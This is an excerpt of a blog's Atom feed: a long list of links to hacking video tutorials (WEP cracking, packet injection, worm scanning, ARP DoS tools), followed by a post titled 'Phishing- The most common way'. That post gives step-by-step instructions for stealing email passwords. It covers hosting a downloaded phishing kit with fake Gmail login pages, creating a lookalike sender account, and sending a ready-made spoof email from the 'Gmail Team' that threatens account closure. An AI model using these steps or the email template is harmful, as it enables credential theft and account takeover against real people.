&lt;a href="http://www.securitytube.net/Public-Key-Cryptography-video.aspx" linkindex="3350"&gt;Public Key Cryptography Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Symmetric-Key-Cryptography-video.aspx" linkindex="3351"&gt;Symmetric Key Cryptography Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/CryptoAnalysis-(Types-of-attacks-on-Cryptography)-video.aspx" linkindex="3352"&gt;CryptoAnalysis (Types of attacks on Cryptography) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/IEEE-802.11W-and-Cisco-MFP-II-video.aspx" linkindex="3353"&gt;IEEE 802.11W and Cisco MFP II Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/IEEE-802.11W-and-Cisco-MFP-I-video.aspx" linkindex="3354"&gt;IEEE 802.11W and Cisco MFP I Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/War-Driving-is-so-2000,-Here-comes-war-shipping-video.aspx" linkindex="3355"&gt;War Driving is so 2000, Here comes war shipping Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/RSA-2006-Keynote-Bill-Gates-video.aspx" linkindex="3356"&gt;RSA 2006 Keynote Bill Gates Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Cryptography-(Introduction)-video.aspx" linkindex="3357"&gt;Cryptography (Introduction) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Cold-Boot-Encryption-Attack-video.aspx" linkindex="3358"&gt;Cold Boot Encryption Attack Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Fatal-DNS-Attack-Discovered-video.aspx" linkindex="3359"&gt;Fatal DNS Attack Discovered Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Cool-Computer-Program-video.aspx" linkindex="3360"&gt;Cool Computer Program Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/WEP-Tutorial-3-video.aspx" linkindex="3361"&gt;WEP Tutorial 3 Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/WEP-Tutorial-2-video.aspx" linkindex="3362"&gt;WEP Tutorial 2 Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/WEP-Tutorial-1-video.aspx" linkindex="3363"&gt;WEP Tutorial 1 Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/CSMA-CA-video.aspx" linkindex="3364"&gt;CSMA CA Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Access-Control-(CSMA-CD)-video.aspx" linkindex="3365"&gt;Access Control (CSMA CD) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Analyzing-Robots.txt-for-Fun-and-Profit-video.aspx" linkindex="3366"&gt;Analyzing Robots.txt for Fun and Profit Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Automated-Mining-of-FTP-Sites-for-Fun-and-Profit-video.aspx" linkindex="3367"&gt;Automated Mining of FTP Sites for Fun and Profit Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/SSL-MITM-Attack-Over-Wireless-Demo-video.aspx" linkindex="3368"&gt;SSL MITM Attack Over Wireless Demo Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/SSL-MITM-Attack-Over-Wireless-video.aspx" linkindex="3369"&gt;SSL MITM Attack Over Wireless Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Install-Vista-in-2-mins-(funny)-video.aspx" linkindex="3370"&gt;Install Vista in 2 mins (funny) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/How-Spammers-Abuse-Whois-and-SMTP-Part-3-video.aspx" linkindex="3371"&gt;How Spammers Abuse Whois and SMTP Part 3 Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/How-Spammers-Abuse-Whois-and-SMTP-Part-2-video.aspx" linkindex="3372"&gt;How Spammers Abuse Whois and SMTP Part 2 Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/How-Spammers-Abuse-Whois-and-SMTP-Part-1-video.aspx" linkindex="3373"&gt;How Spammers Abuse Whois and SMTP Part 1 Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/USB-Beer-(-Funny-Video-)-video.aspx" linkindex="3374"&gt;USB Beer ( Funny Video ) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/User-Information-Leakage-on-P2P-Networks-video.aspx" linkindex="3375"&gt;User Information Leakage on P2P Networks Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Changing-your-Firefox-User-Agent-to-Emulate-Googlebot-video.aspx" linkindex="3376"&gt;Changing your Firefox User Agent to Emulate Googlebot Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Virtual-carrier-sensing-(NAV)-mechanism-video.aspx" linkindex="3377"&gt;Virtual carrier sensing (NAV) mechanism Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/WiFi-State-Machine-(Part-3)-video.aspx" linkindex="3378"&gt;WiFi State Machine (Part 3) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/WiFi-State-Machine-(Part-2)-video.aspx" linkindex="3379"&gt;WiFi State Machine (Part 2) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/WiFi-State-Machine-(Part-1)-video.aspx" linkindex="3380"&gt;WiFi State Machine (Part 1) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/WiFi-MAC-header-(Part-2)-video.aspx" linkindex="3381"&gt;WiFi MAC header (Part 2) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/WiFi-MAC-header-(Part-1)-video.aspx" linkindex="3382"&gt;WiFi MAC header (Part 1) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Wireless-Frames--Format-and-Types-video.aspx" linkindex="3383"&gt;Wireless Frames  Format and Types Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Connecting-wireless-station-to-AP-video.aspx" linkindex="3384"&gt;Connecting wireless station to AP Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/fping-(Part-4)-video.aspx" linkindex="3385"&gt;fping (Part 4) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/fping-(Part-3)-video.aspx" linkindex="3386"&gt;fping (Part 3) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/fping-(Part-2)-video.aspx" linkindex="3387"&gt;fping (Part 2) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/fping-(Part-1)-video.aspx" linkindex="3388"&gt;fping (Part 1) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/RC4-Basics-Presentation-(2)-video.aspx" linkindex="3389"&gt;RC4 Basics Presentation (2) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Macchanger-video.aspx" linkindex="3390"&gt;Macchanger Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Pcap2air-video.aspx" linkindex="3391"&gt;Pcap2air Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Netstumbler-(Part-2)-video.aspx" linkindex="3392"&gt;Netstumbler (Part 2) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Netstumbler-(Part-1)-video.aspx" linkindex="3393"&gt;Netstumbler (Part 1) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/AireplayNG-(Part-5)-video.aspx" linkindex="3394"&gt;AireplayNG (Part 5) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/AireplayNG-(Part-4)-video.aspx" linkindex="3395"&gt;AireplayNG (Part 4) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/AireplayNG-(Part-3)-video.aspx" linkindex="3396"&gt;AireplayNG (Part 3) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/AireplayNG-(Part-2)-video.aspx" linkindex="3397"&gt;AireplayNG (Part 2) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/AireplayNG-(Part-1)-video.aspx" linkindex="3398"&gt;AireplayNG (Part 1) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/ARP-Packet-Injection-Programming-video.aspx" linkindex="3399"&gt;ARP Packet Injection Programming Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/TCP-Packet-Injection-(2)-video.aspx" linkindex="3400"&gt;TCP Packet Injection (2) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/TCP-Packet-Injection-video.aspx" linkindex="3401"&gt;TCP Packet Injection Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/IP-Packet-Injection-(2)-video.aspx" linkindex="3402"&gt;IP Packet Injection (2) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/IP-Packet-Injection-video.aspx" linkindex="3403"&gt;IP Packet Injection Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Ethernet-Packet-Injection-video.aspx" linkindex="3404"&gt;Ethernet Packet Injection Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Generic-Packet-Injection-Program-(2)-video.aspx" linkindex="3405"&gt;Generic Packet Injection Program (2) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Packet-Injection-Basics-Presentation-video.aspx" linkindex="3406"&gt;Packet Injection Basics Presentation Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Packet-Sniffing-using-Wireshark-video.aspx" linkindex="3407"&gt;Packet Sniffing using Wireshark Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Packet-Sniffing-using-Tcpdump-video.aspx" linkindex="3408"&gt;Packet Sniffing using Tcpdump Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Data-Packet-Sniffer-Programming--video.aspx" linkindex="3409"&gt;Data Packet Sniffer Programming  Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/TCP-Packet-Sniffer-Programming--video.aspx" linkindex="3410"&gt;TCP Packet Sniffer Programming  Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/IP-Packet-Sniffer-Programming--video.aspx" linkindex="3411"&gt;IP Packet Sniffer Programming  Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Ethernet-Packet-Sniffer-Programming--video.aspx" linkindex="3412"&gt;Ethernet Packet Sniffer Programming  Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Generic-Packet-Sniffer-Programming-(2)-video.aspx" linkindex="3413"&gt;Generic Packet Sniffer Programming (2) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Generic-Packet-Sniffer-Programming-video.aspx" linkindex="3414"&gt;Generic Packet Sniffer Programming Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Raw-Sockets-Basics-Presentation-(2)-video.aspx" linkindex="3415"&gt;Raw Sockets Basics Presentation (2) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Raw-Sockets-Basics-Presentation-video.aspx" linkindex="3416"&gt;Raw Sockets Basics Presentation Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Internet-Worm-IP-Scanning-Programming-(2)-video.aspx" linkindex="3417"&gt;Internet Worm IP Scanning Programming (2) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Internet-Worm-IP-Scanning-Programming-video.aspx" linkindex="3418"&gt;Internet Worm IP Scanning Programming Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Internet-Worm-Basics-Presentation-(2)-video.aspx" linkindex="3419"&gt;Internet Worm Basics Presentation (2) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Internet-Worm-Basics-Presentation-video.aspx" linkindex="3420"&gt;Internet Worm Basics Presentation Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Programming-an-ARP-DoS-Tool-(2)-video.aspx" linkindex="3421"&gt;Programming an ARP DoS Tool (2) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Programming-an-ARP-DoS-Tool-video.aspx" linkindex="3422"&gt;Programming an ARP DoS Tool Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Sending-Messages-using-IPC-Framework-video.aspx" linkindex="3423"&gt;Sending Messages using IPC Framework Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Programming-the-Framework-video.aspx" linkindex="3424"&gt;Programming the Framework Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Architecture-of-Security-Tools-Presentation-(2)-video.aspx" linkindex="3425"&gt;Architecture of Security Tools Presentation (2) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Architecture-of-Security-Tools-Presentation-video.aspx" linkindex="3426"&gt;Architecture of Security Tools Presentation Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/RC4-File-Encrypt-Decrypt-Program-video.aspx" linkindex="3427"&gt;RC4 File Encrypt Decrypt Program Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/RC4-Simulation-using-C-video.aspx" linkindex="3428"&gt;RC4 Simulation using C Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/RC4-Basics-Presentation-video.aspx" linkindex="3429"&gt;RC4 Basics Presentation Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/VMWare-Hacking-at-Defcon-15-video.aspx" linkindex="3430"&gt;VMWare Hacking at Defcon 15 Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Bruice-Schneier-at-Defcon-15-video.aspx" linkindex="3431"&gt;Bruice Schneier at Defcon 15 Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Home-using-WEP-gets-Hacked-video.aspx" linkindex="3432"&gt;Home using WEP gets Hacked Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/History-of-Hacking-Part-5-video.aspx" linkindex="3433"&gt;History of Hacking Part 5 Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/History-of-Hacking-Part-4-video.aspx" linkindex="3434"&gt;History of Hacking Part 4 Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/History-of-Hacking-Part-3-video.aspx" linkindex="3435"&gt;History of Hacking Part 3 Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/History-of-Hacking-Part-2-video.aspx" linkindex="3436"&gt;History of Hacking Part 2 Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/History-of-Hacking-Part-1-video.aspx" linkindex="3437"&gt;History of Hacking Part 1 Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Prism-Strip-video.aspx" linkindex="3438"&gt;Prism Strip Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Simple-Replay-video.aspx" linkindex="3439"&gt;Simple Replay Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/AirodumpNG-Basics-(Part-II)-video.aspx" linkindex="3440"&gt;AirodumpNG Basics (Part II) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/AirodumpNG-Basics-(Part-I)-video.aspx" linkindex="3441"&gt;AirodumpNG Basics (Part I) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/AirdecapNG-video.aspx" linkindex="3442"&gt;AirdecapNG Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/AirmonNG-video.aspx" linkindex="3443"&gt;AirmonNG Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/TCP-Echo-Client-using-Sockets-video.aspx" linkindex="3444"&gt;TCP Echo Client using Sockets Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/TCP-Echo-Server-using-Sockets-video.aspx" linkindex="3445"&gt;TCP Echo Server using Sockets Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Hello-World-TCP-Server-using-Sockets-(2)-video.aspx" linkindex="3446"&gt;Hello World TCP Server using Sockets (2) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Socket-Programming-Basics-Presentation-(3)-video.aspx" linkindex="3447"&gt;Socket Programming Basics Presentation (3) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Socket-Programming-Basics-Presentation-(2)-video.aspx" linkindex="3448"&gt;Socket Programming Basics Presentation (2) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Hello-World-TCP-Server-using-Sockets-video.aspx" linkindex="3449"&gt;Hello World TCP Server using Sockets Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Socket-Programming-Basics-Presentation-video.aspx" linkindex="3450"&gt;Socket Programming Basics Presentation Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Vehicular-Communication-Basics-(3)-video.aspx" linkindex="3451"&gt;Vehicular Communication Basics (3) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Vehicular-Communication-Basics-(2)-video.aspx" linkindex="3452"&gt;Vehicular Communication Basics (2) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Vehicular-Communication-Basics-video.aspx" linkindex="3453"&gt;Vehicular Communication Basics Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Wireshark-Basics-(3)-video.aspx" linkindex="3454"&gt;Wireshark Basics (3) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Wireshark-Basics-(2)-video.aspx" linkindex="3455"&gt;Wireshark Basics (2) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Wireshark-Basics-(1)-video.aspx" linkindex="3456"&gt;Wireshark Basics (1) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Nmap-(-OS-and-Service-Fingerprinting)-video.aspx" linkindex="3457"&gt;Nmap ( OS and Service Fingerprinting) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Nmap-Usage-Basics-video.aspx" linkindex="3458"&gt;Nmap Usage Basics Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Network-Grep-(Ngrep)-Basics-video.aspx" linkindex="3459"&gt;Network Grep (Ngrep) Basics Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Netcat-Basics-(Bind-Remote-Shell)-video.aspx" linkindex="3460"&gt;Netcat Basics (Bind Remote Shell) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Netcat-Basics-(Server-Mode)-video.aspx" linkindex="3461"&gt;Netcat Basics (Server Mode) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Netcat-Basics-(Client-Mode)-video.aspx" linkindex="3462"&gt;Netcat Basics (Client Mode) Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Netbios-Basics-using-SMBClient-Part-2-video.aspx" linkindex="3463"&gt;Netbios Basics using SMBClient Part 2 Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Netbios-Basics-using-SMBClient-Part-1--video.aspx" linkindex="3464"&gt;Netbios Basics using SMBClient Part 1  Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/DNS-Zone-Transfer-using-DIG-video.aspx" linkindex="3465"&gt;DNS Zone Transfer using DIG Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.securitytube.net/Domain-Information-Groper-(-DIG-)-Basics-video.aspx" linkindex="3466"&gt;Domain Information Groper ( DIG ) Basics Video Tutorial&lt;/a&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/form&gt;</content><link href="http://i-xploit.blogspot.com/feeds/2163389234289527001/comments/default" rel="replies" title="Post Comments" type="application/atom+xml"/><link href="http://i-xploit.blogspot.com/2010/01/867-hacking-video-tutorials.html#comment-form" rel="replies" title="0 Comments" type="text/html"/><link href="http://www.blogger.com/feeds/4293538220121388026/posts/default/2163389234289527001" rel="edit" type="application/atom+xml"/><link href="http://www.blogger.com/feeds/4293538220121388026/posts/default/2163389234289527001" rel="self" type="application/atom+xml"/><link href="http://i-xploit.blogspot.com/2010/01/867-hacking-video-tutorials.html" rel="alternate" title="867 Hacking Video Tutorials" type="text/html"/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image height="16" rel="http://schemas.google.com/g/2005#thumbnail" src="https://img1.blogblog.com/img/b16-rounded.gif" width="16"/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4293538220121388026.post-5657418073624082255</id><published>2010-01-16T14:38:00.000+05:30</published><updated>2010-01-16T14:38:36.907+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><title type="text">Phishing- The most common way.</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi28mIgiuJycaVALjqJN66oyXE_qNFOQTOx4GEsSzgb7PcT8wSwsd0g3UIhH_xl1BHJ9IotPQ5mm1uKo7fW-l2OvEgd7PHSaEDbryo90JArljhNIzmF1GYZnDQrmzlD_xiOanjspGSc3i0/s1600/how+to+hack+proof+email+account+password+msn+yahoo+email+hacking.jpg" imageanchor="1" linkindex="14" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi28mIgiuJycaVALjqJN66oyXE_qNFOQTOx4GEsSzgb7PcT8wSwsd0g3UIhH_xl1BHJ9IotPQ5mm1uKo7fW-l2OvEgd7PHSaEDbryo90JArljhNIzmF1GYZnDQrmzlD_xiOanjspGSc3i0/s320/how+to+hack+proof+email+account+password+msn+yahoo+email+hacking.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;/div&gt;&lt;br /&gt;
Download this RAR first&lt;br /&gt;
&lt;a href="http://www.megaupload.com/?d=UE64AM68" linkindex="15" onclick="" target="_blank"&gt;http://www.megaupload.com/?d=UE64AM68&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
then make an account on &lt;a href="http://www.justfree.com/" linkindex="16" onclick="" target="_blank"&gt;www.justfree.com&lt;/a&gt;&lt;br /&gt;
(note: the account name should be securedgmail.justfree.com or securedymail.justfree.com. Depends on the email id you want to hack (gmail, yahoo, live....))&lt;br /&gt;
&lt;br /&gt;
then login to ur account and go to file manager&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
den uplaod any one of the page u desire from the rar with the google logo in it and with the login.txt file + the mailer.php file&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
make and fake email id ...&lt;br /&gt;
&lt;br /&gt;
for example i wanna hack gmail acc .&lt;br /&gt;
&lt;br /&gt;
den make and id on gmail ..&lt;br /&gt;
&lt;br /&gt;
the id should be like this&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
confirmergmailserver@gmail.com or gmailaccountprotector1@gmail.com&lt;br /&gt;
&lt;br /&gt;
or so ..&lt;br /&gt;
&lt;br /&gt;
make one .. id like dis&lt;br /&gt;
&lt;br /&gt;
get the id of the person u wanna hack&lt;br /&gt;
&lt;br /&gt;
and send a email from the id u just created to the victam .. in the email give the link of the fake page&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;Email Format::::&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="para"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="para"&gt;Keep The subjet as : Account Confirmation : Gmail&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Body :&lt;br /&gt;
&lt;br /&gt;
Dear User ,&lt;br /&gt;
&lt;br /&gt;
We are having some problems with our servers , and we need to confirm each and every email id now . We are really sorry for the inconvenience but its very important for you to confirm your email address , if you do not confirm your email address within 3 days , we may even have to close your account&lt;br /&gt;
&lt;br /&gt;
Click On Your Confirmation Code to Confirm : 2323323&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
After clicking on the code just enter your email ID and password and sign in .&lt;br /&gt;
&lt;br /&gt;
Sorry For the inconvenience .&lt;br /&gt;
&lt;br /&gt;
Regards ,&lt;br /&gt;
&lt;br /&gt;
Gmail Team&lt;br /&gt;
&lt;/div&gt;&lt;div class="para"&gt;&lt;br /&gt;
&lt;br /&gt;
check your log.txt in file manager for the password.&lt;br /&gt;
&lt;/div&gt;&lt;div class="para"&gt;&lt;br /&gt;
&lt;/div&gt;</content><link href="http://i-xploit.blogspot.com/feeds/5657418073624082255/comments/default" rel="replies" title="Post Comments" type="application/atom+xml"/><link href="http://i-xploit.blogspot.com/2010/01/phishing-most-common-way.html#comment-form" rel="replies" title="0 Comments" type="text/html"/><link href="http://www.blogger.com/feeds/4293538220121388026/posts/default/5657418073624082255" rel="edit" type="application/atom+xml"/><link href="http://www.blogger.com/feeds/4293538220121388026/posts/default/5657418073624082255" rel="self" type="application/atom+xml"/><link href="http://i-xploit.blogspot.com/2010/01/phishing-most-common-way.html" rel="alternate" title="Phishing- The most common way." type="text/html"/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image height="16" rel="http://schemas.google.com/g/2005#thumbnail" src="https://img1.blogblog.com/img/b16-rounded.gif" width="16"/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi28mIgiuJycaVALjqJN66oyXE_qNFOQTOx4GEsSzgb7PcT8wSwsd0g3UIhH_xl1BHJ9IotPQ5mm1uKo7fW-l2OvEgd7PHSaEDbryo90JArljhNIzmF1GYZnDQrmzlD_xiOanjspGSc3i0/s72-c/how+to+hack+proof+email+account+password+msn+yahoo+email+hacking.jpg" width="72"/><thr:total>0</thr:total></entry></feed>